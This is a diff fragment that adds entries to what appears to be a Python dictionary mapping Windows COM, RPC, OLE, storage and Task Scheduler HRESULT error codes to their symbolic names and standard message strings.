+ 0x80004027: ("CO_E_CLASS_DISABLED", "The component or application containing the component has been disabled."),
+ 0x80004028: ("CO_E_CLRNOTAVAILABLE", "The common language runtime is not available."),
+ 0x80004029: ("CO_E_ASYNC_WORK_REJECTED", "The thread-pool rejected the submitted asynchronous work."),
+ 0x8000402A: ("CO_E_SERVER_INIT_TIMEOUT", "The server started, but it did not finish initializing in a timely fashion."),
+ 0x8000402B: ("CO_E_NO_SECCTX_IN_ACTIVATE", "Unable to complete the call because there is no COM+ security context inside IObjectControl.Activate."),
+ 0x80004030: ("CO_E_TRACKER_CONFIG", "The provided tracker configuration is invalid."),
+ 0x80004031: ("CO_E_THREADPOOL_CONFIG", "The provided thread pool configuration is invalid."),
+ 0x80004032: ("CO_E_SXS_CONFIG", "The provided side-by-side configuration is invalid."),
+ 0x80004033: ("CO_E_MALFORMED_SPN", "The server principal name (SPN) obtained during security negotiation is malformed."),
+ 0x8000FFFF: ("E_UNEXPECTED", "Catastrophic failure."),
+ 0x80010001: ("RPC_E_CALL_REJECTED", "Call was rejected by callee."),
+ 0x80010002: ("RPC_E_CALL_CANCELED", "Call was canceled by the message filter."),
+ 0x80010003: ("RPC_E_CANTPOST_INSENDCALL", "The caller is dispatching an intertask SendMessage call and cannot call out via PostMessage."),
+ 0x80010004: ("RPC_E_CANTCALLOUT_INASYNCCALL", "The caller is dispatching an asynchronous call and cannot make an outgoing call on behalf of this call."),
+ 0x80010005: ("RPC_E_CANTCALLOUT_INEXTERNALCALL", "It is illegal to call out while inside message filter."),
+ 0x80010006: ("RPC_E_CONNECTION_TERMINATED", "The connection terminated or is in a bogus state and can no longer be used. Other connections are still valid."),
+ 0x80010007: ("RPC_E_SERVER_DIED", "The callee (the server, not the server application) is not available and disappeared; all connections are invalid. The call may have executed."),
+ 0x80010008: ("RPC_E_CLIENT_DIED", "The caller (client) disappeared while the callee (server) was processing a call."),
+ 0x80010009: ("RPC_E_INVALID_DATAPACKET", "The data packet with the marshaled parameter data is incorrect."),
+ 0x8001000A: ("RPC_E_CANTTRANSMIT_CALL", "The call was not transmitted properly; the message queue was full and was not emptied after yielding."),
+ 0x8001000B: ("RPC_E_CLIENT_CANTMARSHAL_DATA", "The client RPC caller cannot marshal the parameter data due to errors (such as low memory)."),
+ 0x8001000C: ("RPC_E_CLIENT_CANTUNMARSHAL_DATA", "The client RPC caller cannot unmarshal the return data due to errors (such as low memory)."),
+ 0x8001000D: ("RPC_E_SERVER_CANTMARSHAL_DATA", "The server RPC callee cannot marshal the return data due to errors (such as low memory)."),
+ 0x8001000E: ("RPC_E_SERVER_CANTUNMARSHAL_DATA", "The server RPC callee cannot unmarshal the parameter data due to errors (such as low memory)."),
+ 0x8001000F: ("RPC_E_INVALID_DATA", "Received data is invalid. The data may be server or client data."),
+ 0x80010010: ("RPC_E_INVALID_PARAMETER", "A particular parameter is invalid and cannot be (un)marshaled."),
+ 0x80010011: ("RPC_E_CANTCALLOUT_AGAIN", "There is no second outgoing call on same channel in DDE conversation."),
+ 0x80010012: ("RPC_E_SERVER_DIED_DNE", "The callee (the server, not the server application) is not available and disappeared; all connections are invalid. The call did not execute."),
+ 0x80010100: ("RPC_E_SYS_CALL_FAILED", "System call failed."),
+ 0x80010101: ("RPC_E_OUT_OF_RESOURCES", "Could not allocate some required resource (such as memory or events)"),
+ 0x80010102: ("RPC_E_ATTEMPTED_MULTITHREAD", "Attempted to make calls on more than one thread in single-threaded mode."),
+ 0x80010103: ("RPC_E_NOT_REGISTERED", "The requested interface is not registered on the server object."),
+ 0x80010104: ("RPC_E_FAULT", "RPC could not call the server or could not return the results of calling the server."),
+ 0x80010105: ("RPC_E_SERVERFAULT", "The server threw an exception."),
+ 0x80010106: ("RPC_E_CHANGED_MODE", "Cannot change thread mode after it is set."),
+ 0x80010107: ("RPC_E_INVALIDMETHOD", "The method called does not exist on the server."),
+ 0x80010108: ("RPC_E_DISCONNECTED", "The object invoked has disconnected from its clients."),
+ 0x80010109: ("RPC_E_RETRY", "The object invoked chose not to process the call now. Try again later."),
+ 0x8001010A: ("RPC_E_SERVERCALL_RETRYLATER", "The message filter indicated that the application is busy."),
+ 0x8001010B: ("RPC_E_SERVERCALL_REJECTED", "The message filter rejected the call."),
+ 0x8001010C: ("RPC_E_INVALID_CALLDATA", "A call control interface was called with invalid data."),
+ 0x8001010D: ("RPC_E_CANTCALLOUT_ININPUTSYNCCALL", "An outgoing call cannot be made because the application is dispatching an input-synchronous call."),
+ 0x8001010E: ("RPC_E_WRONG_THREAD", "The application called an interface that was marshaled for a different thread."),
+ 0x8001010F: ("RPC_E_THREAD_NOT_INIT", "CoInitialize has not been called on the current thread."),
+ 0x80010110: ("RPC_E_VERSION_MISMATCH", "The version of OLE on the client and server machines does not match."),
+ 0x80010111: ("RPC_E_INVALID_HEADER", "OLE received a packet with an invalid header."),
+ 0x80010112: ("RPC_E_INVALID_EXTENSION", "OLE received a packet with an invalid extension."),
+ 0x80010113: ("RPC_E_INVALID_IPID", "The requested object or interface does not exist."),
+ 0x80010114: ("RPC_E_INVALID_OBJECT", "The requested object does not exist."),
+ 0x80010115: ("RPC_S_CALLPENDING", "OLE has sent a request and is waiting for a reply."),
+ 0x80010116: ("RPC_S_WAITONTIMER", "OLE is waiting before retrying a request."),
+ 0x80010117: ("RPC_E_CALL_COMPLETE", "Call context cannot be accessed after call completed."),
+ 0x80010118: ("RPC_E_UNSECURE_CALL", "Impersonate on unsecure calls is not supported."),
+ 0x80010119: ("RPC_E_TOO_LATE", "Security must be initialized before any interfaces are marshaled or unmarshaled. It cannot be changed after initialized."),
+ 0x8001011A: ("RPC_E_NO_GOOD_SECURITY_PACKAGES", "No security packages are installed on this machine, the user is not logged on, or there are no compatible security packages between the client and server."),
+ 0x8001011B: ("RPC_E_ACCESS_DENIED", "Access is denied."),
+ 0x8001011C: ("RPC_E_REMOTE_DISABLED", "Remote calls are not allowed for this process."),
+ 0x8001011D: ("RPC_E_INVALID_OBJREF", "The marshaled interface data packet (OBJREF) has an invalid or unknown format."),
+ 0x8001011E: ("RPC_E_NO_CONTEXT", "No context is associated with this call. This happens for some custom marshaled calls and on the client side of the call."),
+ 0x8001011F: ("RPC_E_TIMEOUT", "This operation returned because the time-out period expired."),
+ 0x80010120: ("RPC_E_NO_SYNC", "There are no synchronize objects to wait on."),
+ 0x80010121: ("RPC_E_FULLSIC_REQUIRED", "Full subject issuer chain Secure Sockets Layer (SSL) principal name expected from the server."),
+ 0x80010122: ("RPC_E_INVALID_STD_NAME", "Principal name is not a valid Microsoft standard (msstd) name."),
+ 0x80010123: ("CO_E_FAILEDTOIMPERSONATE", "Unable to impersonate DCOM client."),
+ 0x80010124: ("CO_E_FAILEDTOGETSECCTX", "Unable to obtain server's security context."),
+ 0x80010125: ("CO_E_FAILEDTOOPENTHREADTOKEN", "Unable to open the access token of the current thread."),
+ 0x80010126: ("CO_E_FAILEDTOGETTOKENINFO", "Unable to obtain user information from an access token."),
+ 0x80010127: ("CO_E_TRUSTEEDOESNTMATCHCLIENT", "The client who called IAccessControl::IsAccessPermitted was not the trustee provided to the method."),
+ 0x80010128: ("CO_E_FAILEDTOQUERYCLIENTBLANKET", "Unable to obtain the client's security blanket."),
+ 0x80010129: ("CO_E_FAILEDTOSETDACL", "Unable to set a discretionary access control list (ACL) into a security descriptor."),
+ 0x8001012A: ("CO_E_ACCESSCHECKFAILED", "The system function AccessCheck returned false."),
+ 0x8001012B: ("CO_E_NETACCESSAPIFAILED", "Either NetAccessDel or NetAccessAdd returned an error code."),
+ 0x8001012C: ("CO_E_WRONGTRUSTEENAMESYNTAX", "One of the trustee strings provided by the user did not conform to the \ syntax and it was not the *\" string\"."),
+ 0x8001012D: ("CO_E_INVALIDSID", "One of the security identifiers provided by the user was invalid."),
+ 0x8001012E: ("CO_E_CONVERSIONFAILED", "Unable to convert a wide character trustee string to a multiple-byte trustee string."),
+ 0x8001012F: ("CO_E_NOMATCHINGSIDFOUND", "Unable to find a security identifier that corresponds to a trustee string provided by the user."),
+ 0x80010130: ("CO_E_LOOKUPACCSIDFAILED", "The system function LookupAccountSID failed."),
+ 0x80010131: ("CO_E_NOMATCHINGNAMEFOUND", "Unable to find a trustee name that corresponds to a security identifier provided by the user."),
+ 0x80010132: ("CO_E_LOOKUPACCNAMEFAILED", "The system function LookupAccountName failed."),
+ 0x80010133: ("CO_E_SETSERLHNDLFAILED", "Unable to set or reset a serialization handle."),
+ 0x80010134: ("CO_E_FAILEDTOGETWINDIR", "Unable to obtain the Windows directory."),
+ 0x80010135: ("CO_E_PATHTOOLONG", "Path too long."),
+ 0x80010136: ("CO_E_FAILEDTOGENUUID", "Unable to generate a UUID."),
+ 0x80010137: ("CO_E_FAILEDTOCREATEFILE", "Unable to create file."),
+ 0x80010138: ("CO_E_FAILEDTOCLOSEHANDLE", "Unable to close a serialization handle or a file handle."),
+ 0x80010139: ("CO_E_EXCEEDSYSACLLIMIT", "The number of access control entries (ACEs) in an ACL exceeds the system limit."),
+ 0x8001013A: ("CO_E_ACESINWRONGORDER", "Not all the DENY_ACCESS ACEs are arranged in front of the GRANT_ACCESS ACEs in the stream."),
+ 0x8001013B: ("CO_E_INCOMPATIBLESTREAMVERSION", "The version of ACL format in the stream is not supported by this implementation of IAccessControl."),
+ 0x8001013C: ("CO_E_FAILEDTOOPENPROCESSTOKEN", "Unable to open the access token of the server process."),
+ 0x8001013D: ("CO_E_DECODEFAILED", "Unable to decode the ACL in the stream provided by the user."),
+ 0x8001013F: ("CO_E_ACNOTINITIALIZED", "The COM IAccessControl object is not initialized."),
+ 0x80010140: ("CO_E_CANCEL_DISABLED", "Call Cancellation is disabled."),
+ 0x8001FFFF: ("RPC_E_UNEXPECTED", "An internal error occurred."),
+ 0x80020001: ("DISP_E_UNKNOWNINTERFACE", "Unknown interface."),
+ 0x80020003: ("DISP_E_MEMBERNOTFOUND", "Member not found."),
+ 0x80020004: ("DISP_E_PARAMNOTFOUND", "Parameter not found."),
+ 0x80020005: ("DISP_E_TYPEMISMATCH", "Type mismatch."),
+ 0x80020006: ("DISP_E_UNKNOWNNAME", "Unknown name."),
+ 0x80020007: ("DISP_E_NONAMEDARGS", "No named arguments."),
+ 0x80020008: ("DISP_E_BADVARTYPE", "Bad variable type."),
+ 0x80020009: ("DISP_E_EXCEPTION", "Exception occurred."),
+ 0x8002000A: ("DISP_E_OVERFLOW", "Out of present range."),
+ 0x8002000B: ("DISP_E_BADINDEX", "Invalid index."),
+ 0x8002000C: ("DISP_E_UNKNOWNLCID", "Unknown language."),
+ 0x8002000D: ("DISP_E_ARRAYISLOCKED", "Memory is locked."),
+ 0x8002000E: ("DISP_E_BADPARAMCOUNT", "Invalid number of parameters."),
+ 0x8002000F: ("DISP_E_PARAMNOTOPTIONAL", "Parameter not optional."),
+ 0x80020010: ("DISP_E_BADCALLEE", "Invalid callee."),
+ 0x80020011: ("DISP_E_NOTACOLLECTION", "Does not support a collection."),
+ 0x80020012: ("DISP_E_DIVBYZERO", "Division by zero."),
+ 0x80020013: ("DISP_E_BUFFERTOOSMALL", "Buffer too small."),
+ 0x80028016: ("TYPE_E_BUFFERTOOSMALL", "Buffer too small."),
+ 0x80028017: ("TYPE_E_FIELDNOTFOUND", "Field name not defined in the record."),
+ 0x80028018: ("TYPE_E_INVDATAREAD", "Old format or invalid type library."),
+ 0x80028019: ("TYPE_E_UNSUPFORMAT", "Old format or invalid type library."),
+ 0x8002801C: ("TYPE_E_REGISTRYACCESS", "Error accessing the OLE registry."),
+ 0x8002801D: ("TYPE_E_LIBNOTREGISTERED", "Library not registered."),
+ 0x80028027: ("TYPE_E_UNDEFINEDTYPE", "Bound to unknown type."),
+ 0x80028028: ("TYPE_E_QUALIFIEDNAMEDISALLOWED", "Qualified name disallowed."),
+ 0x80028029: ("TYPE_E_INVALIDSTATE", "Invalid forward reference, or reference to uncompiled type."),
+ 0x8002802A: ("TYPE_E_WRONGTYPEKIND", "Type mismatch."),
+ 0x8002802B: ("TYPE_E_ELEMENTNOTFOUND", "Element not found."),
+ 0x8002802C: ("TYPE_E_AMBIGUOUSNAME", "Ambiguous name."),
+ 0x8002802D: ("TYPE_E_NAMECONFLICT", "Name already exists in the library."),
+ 0x8002802E: ("TYPE_E_UNKNOWNLCID", "Unknown language code identifier (LCID)."),
+ 0x8002802F: ("TYPE_E_DLLFUNCTIONNOTFOUND", "Function not defined in specified DLL."),
+ 0x800288BD: ("TYPE_E_BADMODULEKIND", "Wrong module kind for the operation."),
+ 0x800288C5: ("TYPE_E_SIZETOOBIG", "Size may not exceed 64 KB."),
+ 0x800288C6: ("TYPE_E_DUPLICATEID", "Duplicate ID in inheritance hierarchy."),
+ 0x800288CF: ("TYPE_E_INVALIDID", "Incorrect inheritance depth in standard OLE hmember."),
+ 0x80028CA0: ("TYPE_E_TYPEMISMATCH", "Type mismatch."),
+ 0x80028CA1: ("TYPE_E_OUTOFBOUNDS", "Invalid number of arguments."),
+ 0x80028CA2: ("TYPE_E_IOERROR", "I/O error."),
+ 0x80028CA3: ("TYPE_E_CANTCREATETMPFILE", "Error creating unique .tmp file."),
+ 0x80029C4A: ("TYPE_E_CANTLOADLIBRARY", "Error loading type library or DLL."),
+ 0x80029C83: ("TYPE_E_INCONSISTENTPROPFUNCS", "Inconsistent property functions."),
+ 0x80029C84: ("TYPE_E_CIRCULARTYPE", "Circular dependency between types and modules."),
+ 0x80030001: ("STG_E_INVALIDFUNCTION", "Unable to perform requested operation."),
+ 0x80030002: ("STG_E_FILENOTFOUND", "%1 could not be found."),
+ 0x80030003: ("STG_E_PATHNOTFOUND", "The path %1 could not be found."),
+ 0x80030004: ("STG_E_TOOMANYOPENFILES", "There are insufficient resources to open another file."),
+ 0x80030005: ("STG_E_ACCESSDENIED", "Access denied."),
+ 0x80030006: ("STG_E_INVALIDHANDLE", "Attempted an operation on an invalid object."),
+ 0x80030008: ("STG_E_INSUFFICIENTMEMORY", "There is insufficient memory available to complete operation."),
+ 0x80030009: ("STG_E_INVALIDPOINTER", "Invalid pointer error."),
+ 0x80030012: ("STG_E_NOMOREFILES", "There are no more entries to return."),
+ 0x80030013: ("STG_E_DISKISWRITEPROTECTED", "Disk is write-protected."),
+ 0x80030019: ("STG_E_SEEKERROR", "An error occurred during a seek operation."),
+ 0x8003001D: ("STG_E_WRITEFAULT", "A disk error occurred during a write operation."),
+ 0x8003001E: ("STG_E_READFAULT", "A disk error occurred during a read operation."),
+ 0x80030020: ("STG_E_SHAREVIOLATION", "A share violation has occurred."),
+ 0x80030021: ("STG_E_LOCKVIOLATION", "A lock violation has occurred."),
+ 0x80030050: ("STG_E_FILEALREADYEXISTS", "%1 already exists."),
+ 0x80030057: ("STG_E_INVALIDPARAMETER", "Invalid parameter error."),
+ 0x80030070: ("STG_E_MEDIUMFULL", "There is insufficient disk space to complete operation."),
+ 0x800300F0: ("STG_E_PROPSETMISMATCHED", "Illegal write of non-simple property to simple property set."),
+ 0x800300FA: ("STG_E_ABNORMALAPIEXIT", "An application programming interface (API) call exited abnormally."),
+ 0x800300FB: ("STG_E_INVALIDHEADER", "The file %1 is not a valid compound file."),
+ 0x800300FC: ("STG_E_INVALIDNAME", "The name %1 is not valid."),
+ 0x800300FD: ("STG_E_UNKNOWN", "An unexpected error occurred."),
+ 0x800300FE: ("STG_E_UNIMPLEMENTEDFUNCTION", "That function is not implemented."),
+ 0x800300FF: ("STG_E_INVALIDFLAG", "Invalid flag error."),
+ 0x80030100: ("STG_E_INUSE", "Attempted to use an object that is busy."),
+ 0x80030101: ("STG_E_NOTCURRENT", "The storage has been changed since the last commit."),
+ 0x80030102: ("STG_E_REVERTED", "Attempted to use an object that has ceased to exist."),
+ 0x80030103: ("STG_E_CANTSAVE", "Cannot save."),
+ 0x80030104: ("STG_E_OLDFORMAT", "The compound file %1 was produced with an incompatible version of storage."),
+ 0x80030105: ("STG_E_OLDDLL", "The compound file %1 was produced with a newer version of storage."),
+ 0x80030106: ("STG_E_SHAREREQUIRED", "Share.exe or equivalent is required for operation."),
+ 0x80030107: ("STG_E_NOTFILEBASEDSTORAGE", "Illegal operation called on non-file based storage."),
+ 0x80030108: ("STG_E_EXTANTMARSHALLINGS", "Illegal operation called on object with extant marshalings."),
+ 0x80030109: ("STG_E_DOCFILECORRUPT", "The docfile has been corrupted."),
+ 0x80030110: ("STG_E_BADBASEADDRESS", "OLE32.DLL has been loaded at the wrong address."),
+ 0x80030111: ("STG_E_DOCFILETOOLARGE", "The compound file is too large for the current implementation."),
+ 0x80030112: ("STG_E_NOTSIMPLEFORMAT", "The compound file was not created with the STGM_SIMPLE flag."),
+ 0x80030201: ("STG_E_INCOMPLETE", "The file download was aborted abnormally. The file is incomplete."),
+ 0x80030202: ("STG_E_TERMINATED", "The file download has been terminated."),
+ 0x80030305: ("STG_E_STATUS_COPY_PROTECTION_FAILURE", "Generic Copy Protection Error."),
+ 0x80030306: ("STG_E_CSS_AUTHENTICATION_FAILURE", "Copy Protection Error-DVD CSS Authentication failed."),
+ 0x80030307: ("STG_E_CSS_KEY_NOT_PRESENT", "Copy Protection Error-The given sector does not have a valid CSS key."),
+ 0x80030308: ("STG_E_CSS_KEY_NOT_ESTABLISHED", "Copy Protection Error-DVD session key not established."),
+ 0x80030309: ("STG_E_CSS_SCRAMBLED_SECTOR", "Copy Protection Error-The read failed because the sector is encrypted."),
+ 0x8003030A: ("STG_E_CSS_REGION_MISMATCH", "Copy Protection Error-The current DVD's region does not correspond to the region setting of the drive."),
+ 0x8003030B: ("STG_E_RESETS_EXHAUSTED", "Copy Protection Error-The drive's region setting may be permanent or the number of user resets has been exhausted."),
+ 0x80040000: ("OLE_E_OLEVERB", "Invalid OLEVERB structure."),
+ 0x80040001: ("OLE_E_ADVF", "Invalid advise flags."),
+ 0x80040002: ("OLE_E_ENUM_NOMORE", "Cannot enumerate any more because the associated data is missing."),
+ 0x80040003: ("OLE_E_ADVISENOTSUPPORTED", "This implementation does not take advises."),
+ 0x80040004: ("OLE_E_NOCONNECTION", "There is no connection for this connection ID."),
+ 0x80040005: ("OLE_E_NOTRUNNING", "Need to run the object to perform this operation."),
+ 0x80040006: ("OLE_E_NOCACHE", "There is no cache to operate on."),
+ 0x80040007: ("OLE_E_BLANK", "Uninitialized object."),
+ 0x80040008: ("OLE_E_CLASSDIFF", "Linked object's source class has changed."),
+ 0x80040009: ("OLE_E_CANT_GETMONIKER", "Not able to get the moniker of the object."),
+ 0x8004000A: ("OLE_E_CANT_BINDTOSOURCE", "Not able to bind to the source."),
+ 0x8004000B: ("OLE_E_STATIC", "Object is static; operation not allowed."),
+ 0x8004000C: ("OLE_E_PROMPTSAVECANCELLED", "User canceled out of the Save dialog box."),
+ 0x8004000D: ("OLE_E_INVALIDRECT", "Invalid rectangle."),
+ 0x8004000E: ("OLE_E_WRONGCOMPOBJ", "compobj.dll is too old for the ole2.dll initialized."),
+ 0x8004000F: ("OLE_E_INVALIDHWND", "Invalid window handle."),
+ 0x80040010: ("OLE_E_NOT_INPLACEACTIVE", "Object is not in any of the inplace active states."),
+ 0x80040011: ("OLE_E_CANTCONVERT", "Not able to convert object."),
+ 0x80040012: ("OLE_E_NOSTORAGE", "Not able to perform the operation because object is not given storage yet."),
+ 0x80040064: ("DV_E_FORMATETC", "Invalid FORMATETC structure."),
+ 0x80040065: ("DV_E_DVTARGETDEVICE", "Invalid DVTARGETDEVICE structure."),
+ 0x80040066: ("DV_E_STGMEDIUM", "Invalid STDGMEDIUM structure."),
+ 0x80040067: ("DV_E_STATDATA", "Invalid STATDATA structure."),
+ 0x80040068: ("DV_E_LINDEX", "Invalid lindex."),
+ 0x80040069: ("DV_E_TYMED", "Invalid TYMED structure."),
+ 0x8004006A: ("DV_E_CLIPFORMAT", "Invalid clipboard format."),
+ 0x8004006B: ("DV_E_DVASPECT", "Invalid aspects."),
+ 0x8004006C: ("DV_E_DVTARGETDEVICE_SIZE", "The tdSize parameter of the DVTARGETDEVICE structure is invalid."),
+ 0x8004006D: ("DV_E_NOIVIEWOBJECT", "Object does not support IViewObject interface."),
+ 0x80040100: ("DRAGDROP_E_NOTREGISTERED", "Trying to revoke a drop target that has not been registered."),
+ 0x80040101: ("DRAGDROP_E_ALREADYREGISTERED", "This window has already been registered as a drop target."),
+ 0x80040102: ("DRAGDROP_E_INVALIDHWND", "Invalid window handle."),
+ 0x80040110: ("CLASS_E_NOAGGREGATION", "Class does not support aggregation (or class object is remote)."),
+ 0x80040111: ("CLASS_E_CLASSNOTAVAILABLE", "ClassFactory cannot supply requested class."),
+ 0x80040112: ("CLASS_E_NOTLICENSED", "Class is not licensed for use."),
+ 0x80040140: ("VIEW_E_DRAW", "Error drawing view."),
+ 0x80040150: ("REGDB_E_READREGDB", "Could not read key from registry."),
+ 0x80040151: ("REGDB_E_WRITEREGDB", "Could not write key to registry."),
+ 0x80040152: ("REGDB_E_KEYMISSING", "Could not find the key in the registry."),
+ 0x80040153: ("REGDB_E_INVALIDVALUE", "Invalid value for registry."),
+ 0x80040154: ("REGDB_E_CLASSNOTREG", "Class not registered."),
+ 0x80040155: ("REGDB_E_IIDNOTREG", "Interface not registered."),
+ 0x80040156: ("REGDB_E_BADTHREADINGMODEL", "Threading model entry is not valid."),
+ 0x80040160: ("CAT_E_CATIDNOEXIST", "CATID does not exist."),
+ 0x80040161: ("CAT_E_NODESCRIPTION", "Description not found."),
+ 0x80040164: ("CS_E_PACKAGE_NOTFOUND", "No package in the software installation data in Active Directory meets this criteria."),
+ 0x80040165: ("CS_E_NOT_DELETABLE", "Deleting this will break the referential integrity of the software installation data in Active Directory."),
+ 0x80040166: ("CS_E_CLASS_NOTFOUND", "The CLSID was not found in the software installation data in Active Directory."),
+ 0x80040167: ("CS_E_INVALID_VERSION", "The software installation data in Active Directory is corrupt."),
+ 0x80040168: ("CS_E_NO_CLASSSTORE", "There is no software installation data in Active Directory."),
+ 0x80040169: ("CS_E_OBJECT_NOTFOUND", "There is no software installation data object in Active Directory."),
+ 0x8004016A: ("CS_E_OBJECT_ALREADY_EXISTS", "The software installation data object in Active Directory already exists."),
+ 0x8004016B: ("CS_E_INVALID_PATH", "The path to the software installation data in Active Directory is not correct."),
+ 0x8004016C: ("CS_E_NETWORK_ERROR", "A network error interrupted the operation."),
+ 0x8004016D: ("CS_E_ADMIN_LIMIT_EXCEEDED", "The size of this object exceeds the maximum size set by the administrator."),
+ 0x8004016E: ("CS_E_SCHEMA_MISMATCH", "The schema for the software installation data in Active Directory does not match the required schema."),
+ 0x8004016F: ("CS_E_INTERNAL_ERROR", "An error occurred in the software installation data in Active Directory."),
+ 0x80040170: ("CACHE_E_NOCACHE_UPDATED", "Cache not updated."),
+ 0x80040180: ("OLEOBJ_E_NOVERBS", "No verbs for OLE object."),
+ 0x80040181: ("OLEOBJ_E_INVALIDVERB", "Invalid verb for OLE object."),
+ 0x800401A0: ("INPLACE_E_NOTUNDOABLE", "Undo is not available."),
+ 0x800401A1: ("INPLACE_E_NOTOOLSPACE", "Space for tools is not available."),
+ 0x800401C0: ("CONVERT10_E_OLESTREAM_GET", "OLESTREAM Get method failed."),
+ 0x800401C1: ("CONVERT10_E_OLESTREAM_PUT", "OLESTREAM Put method failed."),
+ 0x800401C2: ("CONVERT10_E_OLESTREAM_FMT", "Contents of the OLESTREAM not in correct format."),
+ 0x800401C3: ("CONVERT10_E_OLESTREAM_BITMAP_TO_DIB", "There was an error in a Windows GDI call while converting the bitmap to a device-independent bitmap (DIB)."),
+ 0x800401C4: ("CONVERT10_E_STG_FMT", "Contents of the IStorage not in correct format."),
+ 0x800401C5: ("CONVERT10_E_STG_NO_STD_STREAM", "Contents of IStorage is missing one of the standard streams."),
+ 0x800401C6: ("CONVERT10_E_STG_DIB_TO_BITMAP", "There was an error in a Windows Graphics Device Interface (GDI) call while converting the DIB to a bitmap."),
+ 0x800401D0: ("CLIPBRD_E_CANT_OPEN", "OpenClipboard failed."),
+ 0x800401D1: ("CLIPBRD_E_CANT_EMPTY", "EmptyClipboard failed."),
+ 0x800401D2: ("CLIPBRD_E_CANT_SET", "SetClipboard failed."),
+ 0x800401D3: ("CLIPBRD_E_BAD_DATA", "Data on clipboard is invalid."),
+ 0x800401D4: ("CLIPBRD_E_CANT_CLOSE", "CloseClipboard failed."),
+ 0x800401E0: ("MK_E_CONNECTMANUALLY", "Moniker needs to be connected manually."),
+ 0x800401E1: ("MK_E_EXCEEDEDDEADLINE", "Operation exceeded deadline."),
+ 0x800401E2: ("MK_E_NEEDGENERIC", "Moniker needs to be generic."),
+ 0x800401E3: ("MK_E_UNAVAILABLE", "Operation unavailable."),
+ 0x800401E4: ("MK_E_SYNTAX", "Invalid syntax."),
+ 0x800401E5: ("MK_E_NOOBJECT", "No object for moniker."),
+ 0x800401E6: ("MK_E_INVALIDEXTENSION", "Bad extension for file."),
+ 0x800401E7: ("MK_E_INTERMEDIATEINTERFACENOTSUPPORTED", "Intermediate operation failed."),
+ 0x800401E8: ("MK_E_NOTBINDABLE", "Moniker is not bindable."),
+ 0x800401E9: ("MK_E_NOTBOUND", "Moniker is not bound."),
+ 0x800401EA: ("MK_E_CANTOPENFILE", "Moniker cannot open file."),
+ 0x800401EB: ("MK_E_MUSTBOTHERUSER", "User input required for operation to succeed."),
+ 0x800401EC: ("MK_E_NOINVERSE", "Moniker class has no inverse."),
+ 0x800401ED: ("MK_E_NOSTORAGE", "Moniker does not refer to storage."),
+ 0x800401EE: ("MK_E_NOPREFIX", "No common prefix."),
+ 0x800401EF: ("MK_E_ENUMERATION_FAILED", "Moniker could not be enumerated."),
+ 0x800401F0: ("CO_E_NOTINITIALIZED", "CoInitialize has not been called."),
+ 0x800401F1: ("CO_E_ALREADYINITIALIZED", "CoInitialize has already been called."),
+ 0x800401F2: ("CO_E_CANTDETERMINECLASS", "Class of object cannot be determined."),
+ 0x800401F3: ("CO_E_CLASSSTRING", "Invalid class string."),
+ 0x800401F4: ("CO_E_IIDSTRING", "Invalid interface string."),
+ 0x800401F5: ("CO_E_APPNOTFOUND", "Application not found."),
+ 0x800401F6: ("CO_E_APPSINGLEUSE", "Application cannot be run more than once."),
+ 0x800401F7: ("CO_E_ERRORINAPP", "Some error in application."),
+ 0x800401F8: ("CO_E_DLLNOTFOUND", "DLL for class not found."),
+ 0x800401F9: ("CO_E_ERRORINDLL", "Error in the DLL."),
+ 0x800401FA: ("CO_E_WRONGOSFORAPP", "Wrong operating system or operating system version for application."),
+ 0x800401FB: ("CO_E_OBJNOTREG", "Object is not registered."),
+ 0x800401FC: ("CO_E_OBJISREG", "Object is already registered."),
+ 0x800401FD: ("CO_E_OBJNOTCONNECTED", "Object is not connected to server."),
+ 0x800401FE: ("CO_E_APPDIDNTREG", "Application was launched, but it did not register a class factory."),
+ 0x800401FF: ("CO_E_RELEASED", "Object has been released."),
+ 0x80040201: ("EVENT_E_ALL_SUBSCRIBERS_FAILED", "An event was unable to invoke any of the subscribers."),
+ 0x80040203: ("EVENT_E_QUERYSYNTAX", "A syntax error occurred trying to evaluate a query string."),
+ 0x80040204: ("EVENT_E_QUERYFIELD", "An invalid field name was used in a query string."),
+ 0x80040205: ("EVENT_E_INTERNALEXCEPTION", "An unexpected exception was raised."),
+ 0x80040206: ("EVENT_E_INTERNALERROR", "An unexpected internal error was detected."),
+ 0x80040207: ("EVENT_E_INVALID_PER_USER_SID", "The owner security identifier (SID) on a per-user subscription does not exist."),
+ 0x80040208: ("EVENT_E_USER_EXCEPTION", "A user-supplied component or subscriber raised an exception."),
+ 0x80040209: ("EVENT_E_TOO_MANY_METHODS", "An interface has too many methods to fire events from."),
+ 0x8004020A: ("EVENT_E_MISSING_EVENTCLASS", "A subscription cannot be stored unless its event class already exists."),
+ 0x8004020B: ("EVENT_E_NOT_ALL_REMOVED", "Not all the objects requested could be removed."),
+ 0x8004020C: ("EVENT_E_COMPLUS_NOT_INSTALLED", "COM+ is required for this operation, but it is not installed."),
+ 0x8004020D: ("EVENT_E_CANT_MODIFY_OR_DELETE_UNCONFIGURED_OBJECT", "Cannot modify or delete an object that was not added using the COM+ Administrative SDK."),
+ 0x8004020E: ("EVENT_E_CANT_MODIFY_OR_DELETE_CONFIGURED_OBJECT", "Cannot modify or delete an object that was added using the COM+ Administrative SDK."),
+ 0x8004020F: ("EVENT_E_INVALID_EVENT_CLASS_PARTITION", "The event class for this subscription is in an invalid partition."),
+ 0x80040210: ("EVENT_E_PER_USER_SID_NOT_LOGGED_ON", "The owner of the PerUser subscription is not logged on to the system specified."),
+ 0x80041309: ("SCHED_E_TRIGGER_NOT_FOUND", "Trigger not found."),
+ 0x8004130A: ("SCHED_E_TASK_NOT_READY", "One or more of the properties that are needed to run this task have not been set."),
+ 0x8004130B: ("SCHED_E_TASK_NOT_RUNNING", "There is no running instance of the task."),
+ 0x8004130C: ("SCHED_E_SERVICE_NOT_INSTALLED", "The Task Scheduler service is not installed on this computer."),
+ 0x8004130D: ("SCHED_E_CANNOT_OPEN_TASK", "The task object could not be opened."),
+ 0x8004130E: ("SCHED_E_INVALID_TASK", "The object is either an invalid task object or is not a task object."),
+ 0x8004130F: ("SCHED_E_ACCOUNT_INFORMATION_NOT_SET", "No account information could be found in the Task Scheduler security database for the task indicated."),
+ 0x80041310: ("SCHED_E_ACCOUNT_NAME_NOT_FOUND", "Unable to establish existence of the account specified."),
+ 0x80041311: ("SCHED_E_ACCOUNT_DBASE_CORRUPT", "Corruption was detected in the Task Scheduler security database; the database has been reset."),
+ 0x80041312: ("SCHED_E_NO_SECURITY_SERVICES", "Task Scheduler security services are available only on Windows NT."),
+ 0x80041313: ("SCHED_E_UNKNOWN_OBJECT_VERSION", "The task object version is either unsupported or invalid."),
